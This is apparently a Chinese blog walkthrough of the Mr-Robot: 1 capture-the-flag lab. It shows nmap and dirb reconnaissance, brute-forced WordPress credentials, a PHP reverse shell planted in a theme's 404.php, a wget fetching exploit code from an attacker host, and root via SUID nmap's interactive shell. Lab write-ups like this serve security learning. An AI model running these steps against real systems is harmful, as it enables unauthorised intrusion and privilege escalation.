十三の博客
0%

Mr-Robot: 1

发表于 分类于

Mr-Robot: 1

信息收集

首先还是用nmap拿到对面的ip地址,靶机记得开nat

1
nmap  -n -sP -sn 192.168.100.0/24

image-20221110110904031

nmap -A 192.168.100.171

22,80,443端口

应该又是一场web

image-20221110111230278

1
dirb http://192.168.100.171/

image-20221110111613077

大多都是403,只有一个登录界面有权限,还有一个robots.txt

image-20221110112652658

image-20221110112936692

第一个文件是一堆不知道什么玩意的文件

073403c8a58a1f80d943455fb30724b9(第二个文件是一串字符)

whatweb http://192.168.100.171/wp-login

image-20221110111721740

没找到cms,没有测试到sql(后面才看到是wordpress的博客)

又扫到一个http://192.168.100.171/admin/index.html

image-20221110112147271

随后查攻略得知,上面那个不知道什么玩意的文件是一堆用户名,在后台忘记密码的那个地方进行爆破。

image-20221110114210530

爆破出用户名为Elliot,再用这个字典爆破密码,密码为ER28-0652

漏洞利用

image-20221110114718865

直接把马弄上去

地址为http://192.168.100.171/wordpress/wp-content/themes/twentyfifteen/404.php

image-20221110115211320

随后改成反弹shell的php

1
2
3
cd /usr/share/webshells/php

cat php-reverse-shell.php

image-20221110122205300

提权

还是先弄一个tty出来

python -c 'import pty; pty.spawn("/bin/bash")'

image-20221110122339397

lsb_release -a查看linux版本信息

image-20221110122504710

Ubuntu 14.04

image-20221110122936419

下载exp

用python传过去

1
2
3
4
python -m http.server 2333
mkdir /tmp/sh(如果是提权的话,目前用户需要先创建一个可以创建新文件的文件夹进行操作)
cd /tmp/sh
wget http://192.168.101.20:2333/42276.c

编译

image-20221110123255149

出错了,我们换一个exp

又出错了。。

后来发现需要使用suid提权

find / -perm -u=s -type f 2>/dev/null

寻找具有suid权限的文件

image-20221110123931959

有nmap

nmap --interactive

!sh

image-20221110124024386

(122条消息) nmap提权几种方式_1winner的博客-CSDN博客_nmap提权